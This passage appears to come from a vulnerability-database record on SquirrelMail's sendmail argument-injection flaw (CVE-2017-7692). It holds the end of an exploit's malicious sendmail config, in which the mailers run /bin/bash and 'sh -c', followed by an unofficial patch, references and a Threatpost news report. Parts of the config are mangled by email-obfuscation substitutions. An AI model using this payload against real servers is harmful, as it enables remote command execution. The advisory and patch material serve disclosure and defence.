addr\r\nSfinal=4\r\nR$+ :; <@> [email\u00a0protected] $1 : handle <list:;>\r\nR$* <@> [email\u00a0protected] handle <> and list:;\r\nR$* < @ $+ . > $* $1 < @ $2 > $3\r\nR$* < @ *LOCAL* > $* $1 < @ $j > $2\r\nR$* < $+ > $* $1 $2 $3 defocus\r\n[email\u00a0protected] $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical\r\n[email\u00a0protected] $* [email\u00a0protected] @ $1 ... and exit\r\nR$+ @ $- . UUCP $2!$1 [email\u00a0protected] => h!u\r\nR$+ %% $=w @ $=w $1 @ $2 u%%[email\u00a0protected] => [email\u00a0protected]\r\nSRecurse=97\r\nR$* $: $>canonify $1\r\nR$* [email\u00a0protected] $>parse $1\r\nSparse=0\r\nR$* $: $>Parse0 $1 initial parsing\r\nR<@> $#local $: <@> special case error msgs\r\nR$* $: $>ParseLocal $1 handle local hacks\r\nR$* $: $>Parse1 $1 final parsing\r\nSParse0\r\nR<@> [email\u00a0protected] <@> special case error msgs\r\nR$* : $* ; <@> $#error [email\u00a0protected] 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\"\r\n[email\u00a0protected] <@ $* > < @ $1 > catch \"@@host\" bogosity\r\nR<@ $+> $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$+ <@> $#error [email\u00a0protected] 5.1.3 $: \"553 Hostname required\"\r\nR$* $: <> $1\r\nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4\r\nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4\r\nR<> $* < @ [ $* ] $+ > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid address\"\r\nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3\r\nR<> $* <$* : $* > $* $#error [email\u00a0protected] 5.1.3 $: \"553 Colon illegal in host name part\"\r\nR<> $* $1\r\nR$* < @ . $* > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* .. $* > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* @ > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid route address\"\r\nR$* @ $* < @ $* > $* $#error [email\u00a0protected] 5.1.3 $: \"553 Invalid route address\"\r\nR$* , $~O $* $#error [email\u00a0protected] 5.1.3 $: \"553 Invalid route address\"\r\nR$* < @ > $* [email\u00a0protected] $>Parse0 $>canonify $1 [email\u00a0protected] => user\r\nR< @ $=w . > : $* [email\u00a0protected] $>Parse0 $>canonify $2 @here:... -> ...\r\nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here\r\nR< @ $+ > $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ $=w . > [email\u00a0protected] $>Parse0 $>canonify $1 $2 $3 [email\u00a0protected] -> ...\r\nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\"\r\nR< @ *LOCAL* > $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ *LOCAL* >\r\n [email\u00a0protected] $>Parse0 $>canonify $1 $2 $3 [email\u00a0protected]*LOCAL* -> ...\r\nR$* < @ *LOCAL* > $: $1\r\nSParse1\r\nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec\r\nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path\r\nR$* < @ [ $+ ] : > $* $#esmtp [email\u00a0protected] [$2] $: $1 < @ [$2] > $3 no smarthost: send\r\nR$* < @ [ $+ ] : $- : $*> $* $#$3 [email\u00a0protected] $4 $: $1 < @ [$2] > $5 smarthost with mailer\r\nR$* < @ [ $+ ] : $+ > $* $#esmtp [email\u00a0protected] $3 $: $1 < @ [$2] > $4 smarthost without mailer\r\nR$=L < @ $=w . > $#local $: @ $1 special local names\r\nR$+ < @ $=w . > $#local $: $1 regular local name\r\nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name\r\nR$* < @$* > $* $#esmtp [email\u00a0protected] $2 $: $1 < @ $2 > $3 [email\u00a0protected]\r\nR$=L $#local $: @ $1 special local names\r\nR$+ $#local $: $1 regular local names\r\nSLocal_localaddr\r\nSlocaladdr=5\r\nR$+ $: $1 $| $>\"Local_localaddr\" $1\r\nR$+ $| $#ok [email\u00a0protected] $1 no change\r\nR$+ $| $#$* $#$2\r\nR$+ $| $* $: $1\r\nR$+ + * $#local [email\u00a0protected] $&h $: $1\r\nR$+ + $* $#local [email\u00a0protected] + $2 $: $1 + *\r\nR$+ $: <> $1\r\nR< > $+ $: < > < $1 <> $&h > nope, restore +detail\r\nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail\r\nR< > < $+ <> $* > $: < > < $1 > else discard\r\nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part\r\nR< > < $+ > + $* $#local [email\u00a0protected] $2 $: @ $1 strip the extra +\r\nR< > < $+ > [email\u00a0protected] $1 no +detail\r\nR$+ $: $1 <> $&h add +detail back in\r\nR$+ <> + $* $: $1 + $2 check whether +detail\r\nR$+ <> $* $: $1 else discard\r\nR< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension\r\nR< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension\r\nR< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >\r\nR< $+ > $+ [email\u00a0protected] $>MailerToTriple < $1 > $2 < @ $1 >\r\nSParseLocal=98\r\nSEnvFromL\r\nR<@> $n errors to mailer-daemon\r\n[email\u00a0protected] <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqEnv $1 do masquerading\r\nSEnvToL\r\nR$+ < @ $* > $: $1 strip host part\r\nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type\r\nR<e s> $+ + $* $: $1 remove +detail for sender\r\nR< $* > $+ $: $2 else remove mark\r\nSHdrFromL\r\nR<@> $n errors to mailer-daemon\r\n[email\u00a0protected] <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do masquerading\r\nSHdrToL\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do all-masquerading\r\nSAddDomain\r\nR$* < @ $* > $* [email\u00a0protected] $1 < @ $2 > $3 already fully qualified\r\nR$+ [email\u00a0protected] $1 < @ *LOCAL* > add local qualification\r\nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X %s\r\nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/,\r\n T=X-Unix/X-Unix/X-Unix,\r\n A=sh -c $u\r\n\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)\r\n\r\nEOF\r\n\r\n\r\n\r\n\r\nSOLUTION\r\n\r\nSince the vendor did not respond to our mails, no official fix is available. \r\nHowever, the following unofficial patch can be used to fix this vulnerability.\r\n\r\nBOF\r\ndiff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php\r\n--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000\r\n+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18 11:42:26.505181944 +0000\r\n@@ -93,9 +93,9 @@\r\n $envelopefrom = trim($from->mailbox.'@'.$from->host);\r\n $envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom);\r\n // save executed command for future reference\r\n- $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\";\r\n+ $this->sendmail_command = escapeshellcmd(\"$sendmail_path $this->sendmail_args -f\") . escapeshellarg($envelopefrom);\r\n // open process handle for writing\r\n- $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n+ $stream = popen($this->sendmail_command, \"w\");\r\n return $stream;\r\n }\r\nEOF\r\n\r\n\r\n\r\n\r\nREFERENCES\r\n\r\nhttps://squirrelmail.org/\r\nhttps://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/27626", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-5181", "CVE-2017-7692"], "description": "Developers behind the PHP-based webmail package SquirrelMail patched a remote code execution vulnerability that could let attackers execute arbitrary commands on the target and compromise the system on Thursday.\n\nDawid Golunski, a researcher with [Legal Hackers](<https://legalhackers.com/>) discovered the vulnerability and reported it to the project\u2019s maintainers in January. The researcher has previously uncovered similar remote code execution issues in the email libraries [PHPMailer and SwiftMailer](<https://threatpost.com/phpmailer-swiftmailer-updates-resolve-critical-remote-code-execution-vulnerabilities/122795/>).\n\nDevelopers behind the webmail package had been informed of the vulnerability but it wasn\u2019t clear if it was going to get fixed until a patch arrived yesterday.\n\nGolunski told Threatpost on Thursday that squirrelmail-20170427_0200-SVN.stable includes a patch for the vulnerability.\n\nIn [a description of the bug](<https://squirrelmail.org/security/issue/2017-04-24>) on the package\u2019s site, SquirrelMail confirmed that some builds were vulnerable to a \u201ccommand-line argument injection exploit that could allow arbitrary code execution if $edit_identity and $useSendmail are enabled and user has knowledge of the location and permissions on the SquirrelMail attachment directory.\u201d\n\nThe researcher, who disclosed the vulnerability in [a write-up on his site last Friday](<https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html>), said it stemmed from insufficient escaping of user-supplied data when the package is configured with Sendmail as its main transport.\n\n> [Advisory] SquirrelMail &lt;=1.4.22 Auth. Remote Code Exec[#exploit](<https://twitter.com/hashtag/exploit?src=hash>) [#0day](<https://twitter.com/hashtag/0day?src=hash>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash>) [#vuln](<https://twitter.com/hashtag/vuln?src=hash>) [#hacking](<https://twitter.com/hashtag/hacking?src=hash>) [#rce](<https://twitter.com/hashtag/rce?src=hash>)<https://t.co/nqZgfrXlQB>\n> \n> \u2014 Dawid Golunski (@dawid_golunski) [April 23, 2017](<https://twitter.com/dawid_golunski/status/856217327091822593>)\n\nSendmail, perhaps the most popular mail transfer agent, often comes configured as default on email environments.\n\nThe researcher said that when it uses Sendmail, SquirrelMail failed to take into account a character that can be used by attackers to inject additional parameters. In a proof of concept built by Golunski, he shows how an attacker could inject specific parameters to a malicious Sendmail config file, which can then be uploaded as an attachment to carry out arbitrary command execution.\n\nGolunski documented the vulnerability in a video published earlier this week:\n\nThe proof of concept contains payloads for two vectors, file write, and remote code execution, It requires user credentials and that SquirrelMail uses Sendmail.\n\nGolunski was prompted to release his advisory last week after Filippo Cavallarin, the CEO of Segment, an Italian security firm, disclosed the same issue, via the [Full Disclosure](<http://seclists.org/fulldisclosure/2017/Apr/81>) mailing list archives.\n\nCavallarin said he elected to disclose the vulnerability after he failed to make contact with the project\u2019s maintainers. Golunski said he did manage to make contact and that a CVE (CVE-2017-5181) was assigned to the vulnerability but that the developers behind the package, citing personal issues, requested some time to patch.\n\nThe most recent version, 1.4.22, and prior versions of the package were believed to be vulnerable. Since it\u2019s an open source project and version 1.4.22 was released nearly six years ago, in July 2011, it wasn\u2019t entirely clear if a patch is coming.\n\nUntil a patch was pushed Golunski was encouraging users of the package to switch to SMTP-based transport, as opposed to Sendmail. Cavallarin shared an unofficial patch to fix the vulnerability in his disclosure.\n\nOn Monday Golunski said that he had notified the project that both he and Cavallarin\u2019s disclosures have gone live but hadn\u2019t received a response back yet.\n\n_This article was updated throughout on April 28 to include news on squirrelmail-20170427_0200-SVN.stable and the patch._\n", "modified": "2017-04-28T17:58:56", "published": "2017-04-24T13:52:44", "id": "THREATPOST:0F388C5119C618F2D1F264ECDB1BD186", "href": "https://threatpost.com/no-fix-for-squirrelmail-remote-code-execution-vulnerability/125151/", "type": "threatpost", "title": "SquirrelMail Remote Code Execution Vulnerability Patched", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}